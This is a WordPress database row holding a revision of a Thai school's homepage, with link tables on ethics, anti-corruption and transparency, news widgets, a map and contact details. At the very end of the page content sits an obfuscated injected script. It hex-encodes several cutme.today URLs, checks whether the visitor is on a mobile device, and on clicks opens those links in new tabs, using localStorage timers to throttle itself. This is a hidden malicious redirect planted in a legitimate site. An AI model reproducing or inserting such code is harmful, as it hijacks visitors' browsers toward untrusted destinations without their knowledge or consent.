style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-31 10:44:22','2024-07-31 03:44:22','',14,'http://pakhaeng.ssk.in.th/?p=304',0,'revision','',0),
